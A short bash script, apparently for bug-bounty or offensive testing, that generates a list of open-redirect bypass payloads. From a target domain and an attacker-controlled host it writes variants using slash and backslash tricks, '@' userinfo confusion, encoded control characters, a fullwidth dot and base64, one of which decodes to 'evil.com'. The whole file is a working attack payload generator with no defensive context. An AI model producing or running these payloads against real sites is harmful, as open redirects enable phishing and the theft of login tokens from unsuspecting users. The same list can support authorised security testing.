
#!/bin/bash
# ./url_redir_payload_generation targetwebsitename .tld webhook/sldjf234js
thiersites=$1
tld=$2
mysite=$3

echo '\/'$3|tee -a url_red.txt
echo 'http://'$3|tee -a url_red.txt
echo '\/\/'$3|tee -a url_red.txt
echo '\\'$3|tee -a url_red.txt
echo '//'$3|tee -a url_red.txt
echo '//ZXZpbC5jb20K'|tee -a url_red.txt
echo '//'$1$2'@'$3|tee -a url_red.txt
echo '/\/'$3|tee -a url_red.txt
echo 'https://'$3$2'%3F.'$1$2'/'|tee -a url_red.txt
echo 'https://'$3$2'%2523.'$1$2'/'|tee -a url_red.txt
echo 'https://'$3$2'?c=.'$1$2'/'|tee -a url_red.txt
echo 'https://'$3$2'?c=.'$1$2'\'|tee -a url_red.txt
echo '//%2F/'$3|tee -a url_red.txt
echo '////'$3|tee -a url_red.txt
echo 'https://'$1$2'puter/'|tee -a url_red.txt
echo 'https://'$1$2'.'$3|tee -a url_red.txt
echo '/%0D/'$3|tee -a url_red.txt
echo '/%2F/'$3|tee -a url_red.txt
echo '/%09/'$3|tee -a url_red.txt
echo 'https;'$3|tee -a url_red.txt
echo 'https:'$3|tee -a url_red.txt
echo '/%00/'$3|tee -a url_red.txt
echo 'https://'$1$2'/@'$3|tee -a url_red.txt
echo 'https://'$1$2'\@'$3|tee -a url_red.txt
echo '/%07/'$3|tee -a url_red.txt
echo '/%0a/'$3|tee -a url_red.txt
echo '/%5C'$3|tee -a url_red.txt
echo '@'$3|tee -a url_red.txt
echo $1'@'$3|tee -a url_red.txt
echo '//'$3'%E3%80%82com'|tee -a url_red.txt
echo $3|base64|tee -a url_red.txt
echo $3|tee -a url_red.txt
